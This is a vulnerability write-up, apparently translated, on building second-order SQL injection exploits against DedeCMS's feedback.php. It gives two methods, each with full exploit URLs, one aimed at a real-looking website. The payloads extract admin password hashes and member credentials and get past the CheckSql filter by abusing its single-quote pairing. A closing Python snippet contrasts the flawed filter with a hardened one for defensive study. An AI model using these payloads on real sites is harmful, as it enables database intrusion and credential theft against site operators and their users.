0x01 Preface

Long ago, yy@safekeyer.com found a classic second-order injection in DedeCMS during a code audit. Because the field it lands in cannot exceed 60 bytes, it looked fairly weak, but with the collective wisdom of safekeyer we found two ways to break through the limit. This article focuses on constructing the exp; for the detailed vulnerability analysis see: http://www.wooyun.org/bugs/wooyun-2010-018562

0x02 Method 1: Direct shortening

Theory: insert --> select --> insert --> select

Exp (key data was marked in red in the original):

First insert:

```
http://www.bkjia.com/dede/plus/feedback.php?action=send&comtype=comments&aid=1&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=slep&title=1',"'",8,(select pwd from %23@__admin))%23&sbbt=%E5%8F%91%E9%80%81%E8%AF%84%E8%AE%BA
```

Second insert:

```
http://127.0.0.1/dede/plus/feedback.php?action=send&comtype=reply&fid=27&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=angr&title=1&sbbt=%E5%8F%91%E9%80%81%E8%AF%84%E8%AE%BA
```

The payload carried by the first insert is:

```
1',"'",8,(select pwd from %23@__admin)%23
```

Database: (screenshot in the original)

Returned result: (screenshot in the original)

Analysis of how the check is bypassed:

```php
function CheckSql($db_string, $querytype = 'select')
{
    // ... (omitted here; this part initialises $clean = '', $old_pos = 0, $pos = -1)

    // Walk the statement and replace everything between a pair of single
    // quotes with the marker $s$. Only the single quote is treated as a
    // string delimiter; a backslash skips the character that follows it.
    while (TRUE)
    {
        $pos = strpos($db_string, '\'', $pos + 1);
        if ($pos === FALSE)
        {
            break;
        }
        $clean .= substr($db_string, $old_pos, $pos - $old_pos);
        while (TRUE)
        {
            $pos1 = strpos($db_string, '\'', $pos + 1);
            $pos2 = strpos($db_string, '\\', $pos + 1);
            if ($pos1 === FALSE)
            {
                break;
            }
            elseif ($pos2 == FALSE || $pos2 > $pos1)
            {
                $pos = $pos1;
                break;
            }
            $pos = $pos2 + 1;
        }
        $clean .= '$s$';
        $old_pos = $pos + 1;
    }
    $clean .= substr($db_string, $old_pos);
    // echo $clean; exit();
    $clean = trim(strtolower(preg_replace(array('~\s+~s'), array(' '), $clean)));

    // ... (omitted here; the keyword checks run against $clean)
}
```

The detection code above replaces the content between each pair of single quotes in the SQL statement with $s$. For the second insert, the statement is:

```sql
INSERT INTO `dede_feedback`(`aid`,`typeid`,`username`,`artitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('1','0','test','1',"'",8,(select pwd from dede_admin)#','127.0.0.1','1','000000','2','0','0','feedback','6','asfsafsdaf')
```

After the quote pairing it becomes:

```sql
insert into `dede_feedback`(`aid`,`typeid`,`username`,`artitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`) values($s$,$s$,"$s$,$s$,$s$)
```

and CheckSql($db_string, $querytype = 'select') is bypassed. The key is the handling of single quotes: the single quote inside the double-quoted `"'"` is paired by the check with a later single quote, so the whole injected span, subselect included, is taken for a string literal and collapsed into $s$. In the real INSERT, however, MySQL reads `"'"` as a double-quoted string, the single quote never acts as a delimiter, and the subselect runs.

0x03 Method 2: Combining two inserts

Theory: insert --> select --> insert --> select

Exp (key data was marked in red in the original):

First insert:

```
http://127.0.0.1/dede/plus/feedback.php?action=send&comtype=comments&aid=1&isconfirm=yes&cmtuser=admin&msg=asfsafsdaf&face=6&validate=slep&title=1',(char(@'''),/*&sbbt=%E5%8F%91%E9%80%81%E8%AF%84%E8%AE%BA
```

Second insert:

```
http://127.0.0.1/dede/plus/feedback.php?aid=1&action=send&comtype=reply&fid=48&isconfirm=yes&validate=craf&msg=*/1,2,4,5,6,7,(select/**/concat(userid,0x3a,pwd)/**/from/**/dede_member/**/limit/**/1))%23
```

Different parts of the payload are written to the database by the two insert operations and are then combined into one complete payload.

Payload of the first insert:

```
1',(char(@''')),/*
```

Payload of the second insert:

```
*/1,2,3,4,5,6,7,(select/**/concat(userid,0x3a,pwd)/**/from/**/dede_member/**/limit/**/1)%23
```

The combined statement:

```sql
insert into `dede_feedback`(`aid`,`typeid`,`username`,`artitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('1','0','test','1',(char(@''''),/*','127.0.0.1','1','000000','2','0','0','feedback','0','@'\''*/,2,3,4,5,6,7,8,(select concat(userid,0x7c,pwd) from dede_admin)')
```

After the anti-injection function has processed it:

```sql
insert into `dede_feedback`(`aid`,`typeid`,`username`,`artitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`) values($s$,$s$,(char(@'$s$,$s$,$s$,$s$
```

Database: (screenshot in the original)

Returned results: (screenshot in the original)

0x04 Conclusion

If there are any errors, please correct them. If you have any suggestions, feel free to discuss them.
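As an added illustration (not code from the article or from DedeCMS), here is a Python port of the quote-pairing loop in CheckSql placed beside a literal-stripping pass that honours double quotes the way MySQL's lexer does; SAMPLE_SQL is a constructed, condensed version of the second-insert statement from Method 1. Run on it, the port collapses the injected subselect into `$s$`, while the lexer-aware pass leaves `(select pwd from dede_admin)` visible to any keyword check that runs afterwards.

```python
import re

# Constructed, condensed form of the article's second-insert statement: the
# subselect follows the double-quoted literal "'" so that CheckSql pairs that
# single quote with the one after '#' and treats the whole span as a string.
SAMPLE_SQL = ("INSERT INTO `dede_feedback`(`aid`,`typeid`,`username`,`artitle`,`msg`,`ip`) "
              "VALUES ('1','0','test','1',\"'\",8,(select pwd from dede_admin)#','127.0.0.1')")

def dede_clean(db_string):
    """Port of the quote-pairing loop in DedeCMS CheckSql(): text between each
    pair of single quotes becomes $s$ (backslash-escaped quotes are skipped).
    Double quotes are not a delimiter here, which is the blind spot."""
    clean, old_pos, pos = "", 0, -1
    while True:
        pos = db_string.find("'", pos + 1)
        if pos == -1:
            break
        clean += db_string[old_pos:pos]
        while True:
            pos1 = db_string.find("'", pos + 1)
            pos2 = db_string.find("\\", pos + 1)
            if pos1 == -1:
                break
            if pos2 == -1 or pos2 > pos1:
                pos = pos1
                break
            pos = pos2 + 1
        clean += "$s$"
        old_pos = pos + 1
    # Same final step as CheckSql: collapse whitespace, lowercase.
    return re.sub(r"\s+", " ", clean + db_string[old_pos:]).strip().lower()

def lexer_clean(sql):
    """Hardened pass that delimits literals like MySQL's lexer: ' and " both
    open a literal, a backslash escapes one character, a doubled delimiter is
    an escaped quote. Here "'" is one literal, so the subselect stays visible."""
    out, i = [], 0
    while i < len(sql):
        ch = sql[i]
        if ch in "'\"":
            i += 1
            while i < len(sql) and not (sql[i] == ch and sql[i + 1:i + 2] != ch):
                i += 2 if sql[i] in ("\\", ch) else 1
            out.append("$s$")
        else:
            out.append(ch)
        i += 1
    return re.sub(r"\s+", " ", "".join(out)).strip().lower()
```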